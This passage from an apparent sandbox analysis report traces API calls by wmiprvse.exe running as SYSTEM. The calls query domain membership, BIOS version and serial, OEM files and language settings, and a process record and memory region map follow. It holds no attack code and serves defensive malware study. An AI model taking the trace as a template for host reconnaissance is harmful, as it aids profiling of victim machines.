GetProcAddress (hModule=0x7fefb420000, lpProcName="NetScheduleJobEnum") returned 0x7fefac31ebc [0058.222] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetScheduleJobGetInfo") returned 0x7fefac3200c [0058.222] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetUseGetInfo") returned 0x7fefb3f34c4 [0058.222] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetEnumerateTrustedDomains") returned 0x7fefc8be864 [0058.222] GetProcAddress (hModule=0x7fefb420000, lpProcName="DsGetDcNameW") returned 0x7fefc8b14c0 [0058.223] GetProcAddress (hModule=0x7fefb420000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x7fefad81010 [0058.224] GetProcAddress (hModule=0x7fefb420000, lpProcName="DsRoleFreeMemory") returned 0x7fefad81438 [0058.225] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetRenameMachineInDomain") returned 0x7fefb3f3db8 [0058.225] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetJoinDomain") returned 0x7fefb3f3a4c [0058.225] GetProcAddress (hModule=0x7fefb420000, lpProcName="NetUnjoinDomain") returned 0x7fefb3f3c74 [0058.225] malloc (_Size=0x18) returned 0x2beee0 [0058.225] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0xdfd1d0 | out: Buffer=0xdfd1d0*=0x12cc80*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.227] malloc (_Size=0x18) returned 0x2bef80 [0058.227] SysStringLen (param_1="WORKGROUP") returned 0x9 [0058.228] free (_Block=0x2bef80) [0058.228] DsRoleFreeMemory (Buffer=0x12cc80) [0058.228] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0xdfd1d8 | out: bufptr=0xdfd1d8) returned 0x0 [0058.233] malloc (_Size=0x18) returned 0x2bef80 [0058.233] SafeArrayPutElement (psa=0x11e430, rgIndices=0xdfd1a8, pv=0xefc38) returned 0x0 [0058.233] free (_Block=0x2bef80) [0058.233] malloc (_Size=0x18) returned 0x2bef80 [0058.233] SafeArrayPutElement (psa=0x11e430, rgIndices=0xdfd1a8, pv=0x121628) returned 0x0 [0058.233] free (_Block=0x2bef80) [0058.233] malloc (_Size=0x18) returned 0x2bef80 [0058.233] SafeArrayPutElement (psa=0x11e430, rgIndices=0xdfd1a8, pv=0x121628) returned 0x0 [0058.233] free (_Block=0x2bef80) [0058.233] SafeArrayRedim (in: psa=0x11e430, psaboundNew=0xdfd020 | out: psa=0x11e430) returned 0x0 [0058.234] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x78) returned 0x9bdf0 [0058.234] SafeArrayGetDim (psa=0x11e430) returned 0x1 [0058.234] SafeArrayGetLBound (in: psa=0x11e430, nDim=0x1, plLbound=0xdfcdd4 | out: plLbound=0xdfcdd4) returned 0x0 [0058.234] SafeArrayGetUBound (in: psa=0x11e430, nDim=0x1, plUbound=0xdfcde0 | out: plUbound=0xdfcde0) returned 0x0 [0058.234] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0xef5b0 [0058.234] SafeArrayGetDim (psa=0x11e430) returned 0x1 [0058.234] SafeArrayGetUBound (in: psa=0x11e430, nDim=0x1, plUbound=0xdfcd98 | out: plUbound=0xdfcd98) returned 0x0 [0058.234] SafeArrayGetElemsize (psa=0x11e430) returned 0x8 [0058.234] SafeArrayGetElement (in: psa=0x11e430, rgIndices=0xdfcd28, pv=0xdfcd30 | out: pv=0xdfcd30) returned 0x0 [0058.234] memcpy (in: _Dst=0xdfcd28, _Src=0xf2850, _Size=0x8 | out: _Dst=0xdfcd28) returned 0xdfcd28 [0058.234] memcpy (in: _Dst=0xdfcd28, _Src=0xf2858, _Size=0x8 | out: _Dst=0xdfcd28) returned 0xdfcd28 [0058.234] memcpy (in: _Dst=0xdfcd28, _Src=0xf2860, _Size=0x8 | out: _Dst=0xdfcd28) returned 0xdfcd28 [0058.235] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xef5b0 | out: hHeap=0x60000) returned 1 [0058.235] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9bdf0 | out: hHeap=0x60000) returned 1 [0058.235] NetApiBufferFree (Buffer=0xb3e80) returned 0x0 [0058.235] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0xdfd1c0 | out: Buffer=0xdfd1c0*=0x12cc80*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.236] DsRoleFreeMemory (Buffer=0x12cc80) [0058.237] GetSystemDirectoryW (in: lpBuffer=0xdfcf40, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.237] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0058.237] _itow (in: _Dest=0x1, _Radix=14666544 | out: _Dest=0x1) returned="1" [0058.237] RtlInitAnsiString (in: DestinationString=0xdfc8c0, SourceString=0x0 | out: DestinationString=0xdfc8c0) [0058.237] RtlInitUnicodeString (in: DestinationString=0xdfc8e0, SourceString=0x0 | out: DestinationString=0xdfc8e0) [0058.237] RtlInitAnsiString (in: DestinationString=0xdfc8b0, SourceString=0x0 | out: DestinationString=0xdfc8b0) [0058.237] RtlInitUnicodeString (in: DestinationString=0xdfc8d0, SourceString=0x0 | out: DestinationString=0xdfc8d0) [0058.237] RtlInitUnicodeString (in: DestinationString=0xdfc8d0, SourceString="Support Information" | out: DestinationString="Support Information") [0058.237] RtlInitUnicodeString (in: DestinationString=0xdfc8e0, SourceString="Line1" | out: DestinationString="Line1") [0058.237] RtlInitUnicodeString (in: DestinationString=0xdfc710, SourceString=0x0 | out: DestinationString=0xdfc710) [0058.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\system32\\OemInfo.Ini", NtPathName=0xdfc710, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\system32\\OemInfo.Ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0058.237] NtOpenFile (in: FileHandle=0xdfc850, DesiredAccess=0x80100000, ObjectAttributes=0xdfc720*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\system32\\OemInfo.Ini" (normalized: "c:\\windows\\system32\\oeminfo.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdfc700, ShareAccess=0x7, OpenOptions=0x60 | out: FileHandle=0xdfc850*=0xffffffffffffffff, IoStatusBlock=0xdfc700*(Status=0xb0, Pointer=0xb0, Information=0xc0)) returned 0xc0000034 [0058.237] RtlFreeAnsiString (AnsiString="\\") [0058.238] RtlInitUnicodeString (in: DestinationString=0xdfc710, SourceString=0x0 | out: DestinationString=0xdfc710) [0058.238] CreateFileW (lpFileName="C:\\Windows\\system32\\OemLogo.Bmp" (normalized: "c:\\windows\\system32\\oemlogo.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xffffffffffffffff [0058.238] malloc (_Size=0x48) returned 0x2bd270 [0058.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfcf88 | out: lpSystemTimeAsFileTime=0xdfcf88*(dwLowDateTime=0x30b66b00, dwHighDateTime=0x1d92f76)) [0058.238] malloc (_Size=0x10) returned 0x2bef80 [0058.238] SetEvent (hEvent=0x1fc) returned 1 [0058.238] free (_Block=0x2c2580) [0058.241] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x4) returned 0x9da50 [0058.242] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9da50, pulNumLanguages=0xdfe240 | out: pulNumLanguages=0xdfe240) returned 1 [0058.242] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da50 | out: hHeap=0x60000) returned 1 [0058.245] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0058.251] SetLastError (dwErrCode=0x0) [0058.251] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da70 [0058.251] SetLastError (dwErrCode=0x0) [0058.251] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da70, pcchLanguagesBuffer=0xdfe150 | out: pulNumLanguages=0xdfe248, pwszLanguagesBuffer=0x9da70, pcchLanguagesBuffer=0xdfe150) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x8) returned 0x9da50 [0058.251] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da70 | out: hHeap=0x60000) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x14) returned 0x9d650 [0058.251] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9d650, pulNumLanguages=0xdfe248 | out: pulNumLanguages=0xdfe248) returned 1 [0058.251] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9d650 | out: hHeap=0x60000) returned 1 [0058.255] _wtoi (_String="04") returned 4 [0058.256] _wtoi (_String="14") returned 14 [0058.256] GetLocalTime (in: lpSystemTime=0xdfced0 | out: lpSystemTime=0xdfced0*(wYear=0x7e7, wMonth=0x1, wDayOfWeek=0x1, wDay=0x17, wHour=0x17, wMinute=0x1, wSecond=0x5, wMilliseconds=0x1a4)) [0058.256] _wtoi (_String="01") returned 1 [0058.256] _vsnwprintf (in: _Buffer=0xdfcee0, _BufferCount=0x63, _Format="%d%02d%02d000000.000000+000", _ArgList=0xdfce68 | out: _Buffer="20140401000000.000000+000") returned 25 [0058.256] RegQueryValueExW (in: hKey=0x270, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0xdfd094, lpData=0xdfd750, lpcbData=0xdfd080*=0x410 | out: lpType=0xdfd094*=0x7, lpData=0xdfd750*, lpcbData=0xdfd080*=0x18) returned 0x0 [0058.257] GetProcAddress (hModule=0x7feff2d0000, lpProcName=0x17) returned 0x7feff2d7080 [0058.257] SafeArrayAccessData (in: psa=0x11e670, ppvData=0xdfd0a0 | out: ppvData=0xdfd0a0) returned 0x0 [0058.257] GetProcAddress (hModule=0x7feff2d0000, lpProcName=0x18) returned 0x7feff2d70b0 [0058.257] SafeArrayUnaccessData (psa=0x11e670) returned 0x0 [0058.257] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x78) returned 0x9bdf0 [0058.257] SafeArrayGetDim (psa=0x11e6b0) returned 0x1 [0058.257] SafeArrayGetLBound (in: psa=0x11e6b0, nDim=0x1, plLbound=0xdfcdc4 | out: plLbound=0xdfcdc4) returned 0x0 [0058.257] SafeArrayGetUBound (in: psa=0x11e6b0, nDim=0x1, plUbound=0xdfcdd0 | out: plUbound=0xdfcdd0) returned 0x0 [0058.257] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0xef5e0 [0058.257] SafeArrayGetDim (psa=0x11e6b0) returned 0x1 [0058.257] SafeArrayGetUBound (in: psa=0x11e6b0, nDim=0x1, plUbound=0xdfcd88 | out: plUbound=0xdfcd88) returned 0x0 [0058.257] SafeArrayGetElemsize (psa=0x11e6b0) returned 0x8 [0058.257] SafeArrayGetElement (in: psa=0x11e6b0, rgIndices=0xdfcd18, pv=0xdfcd20 | out: pv=0xdfcd20) returned 0x0 [0058.257] memcpy (in: _Dst=0xdfcd18, _Src=0x9dab0, _Size=0x8 | out: _Dst=0xdfcd18) returned 0xdfcd18 [0058.258] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xef5e0 | out: hHeap=0x60000) returned 1 [0058.259] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9bdf0 | out: hHeap=0x60000) returned 1 [0058.259] GetProcAddress (hModule=0x7feff2d0000, lpProcName=0x10) returned 0x7feff2d4170 [0058.261] lstrlenW (lpString="JP7XY4J") returned 7 [0058.261] lstrlenW (lpString="Dell Inc.") returned 9 [0058.261] lstrlenW (lpString="03/09/2011") returned 10 [0058.262] _wtoi (_String="03") returned 3 [0058.262] _wtoi (_String="2011") returned 2011 [0058.262] GetLocalTime (in: lpSystemTime=0xdfced0 | out: lpSystemTime=0xdfced0*(wYear=0x7e7, wMonth=0x1, wDayOfWeek=0x1, wDay=0x17, wHour=0x17, wMinute=0x1, wSecond=0x5, wMilliseconds=0x1a4)) [0058.262] _wtoi (_String="09") returned 9 [0058.262] _vsnwprintf (in: _Buffer=0xdfcee0, _BufferCount=0x63, _Format="%d%02d%02d000000.000000+000", _ArgList=0xdfce68 | out: _Buffer="20110309000000.000000+000") returned 25 [0058.262] lstrlenW (lpString="1.56") returned 4 [0058.262] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd034) returned 0x0 [0058.262] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.262] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.262] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] SafeArrayPutElement (psa=0x11e670, rgIndices=0xdfd038, pv=0xdfd060) returned 0x0 [0058.263] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x78) returned 0x9bdf0 [0058.263] SafeArrayGetDim (psa=0x11e670) returned 0x1 [0058.263] SafeArrayGetLBound (in: psa=0x11e670, nDim=0x1, plLbound=0xdfcdf4 | out: plLbound=0xdfcdf4) returned 0x0 [0058.263] SafeArrayGetUBound (in: psa=0x11e670, nDim=0x1, plUbound=0xdfce00 | out: plUbound=0xdfce00) returned 0x0 [0058.263] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x28) returned 0xef5e0 [0058.263] SafeArrayGetDim (psa=0x11e670) returned 0x1 [0058.263] SafeArrayGetUBound (in: psa=0x11e670, nDim=0x1, plUbound=0xdfcdb8 | out: plUbound=0xdfcdb8) returned 0x0 [0058.263] SafeArrayGetElemsize (psa=0x11e670) returned 0x4 [0058.263] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.263] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.263] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.264] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.264] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.264] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.264] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.264] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.264] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.265] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.266] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.266] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.266] SafeArrayGetElement (in: psa=0x11e670, rgIndices=0xdfcd50, pv=0xdfcd80 | out: pv=0xdfcd80) returned 0x0 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed530, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed534, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed538, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed53c, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed540, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed544, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.266] memcpy (in: _Dst=0xdfcd48, _Src=0xed548, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed54c, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed550, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed554, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed558, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed55c, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed560, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed564, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed568, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed56c, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed570, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed574, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed578, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.267] memcpy (in: _Dst=0xdfcd48, _Src=0xed57c, _Size=0x4 | out: _Dst=0xdfcd48) returned 0xdfcd48 [0058.268] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0xef5e0 | out: hHeap=0x60000) returned 1 [0058.269] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9bdf0 | out: hHeap=0x60000) returned 1 [0058.271] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x0, Size=0x4) returned 0x9da70 [0058.271] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x9da70, pulNumLanguages=0xdfe240 | out: pulNumLanguages=0xdfe240) returned 1 [0058.271] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x9da70 | out: hHeap=0x60000) returned 1 Thread: id = 67 os_tid = 0xc7c Thread: id = 68 os_tid = 0xc78 Thread: id = 69 os_tid = 0xc74 Thread: id = 70 os_tid = 0xc70 Thread: id = 97 os_tid = 0xf5c Thread: id = 101 os_tid = 0xfa8 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5d64a000" os_pid = "0x430" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d9b2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1316 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1317 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1318 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1319 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1320 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1321 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1322 start_va = 0xd0000 end_va = 0xd4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1323 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1324 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1325 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1326 start_va = 0x130000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1327 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1328 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1329 start_va = 0x3c0000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1330 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1331 start_va = 0x4b0000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1332 start_va = 0x640000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1333 start_va = 0x7d0000 end_va = 0xa9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1334 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1335 start_va = 0xb60000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1336 start_va = 0xc50000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 1337 start_va = 0xcf0000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 1338 start_va = 0xd80000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 1339 start_va = 0xe60000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 1340 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 1341 start_va = 0xfa0000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1342 start_va = 0x10c0000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = 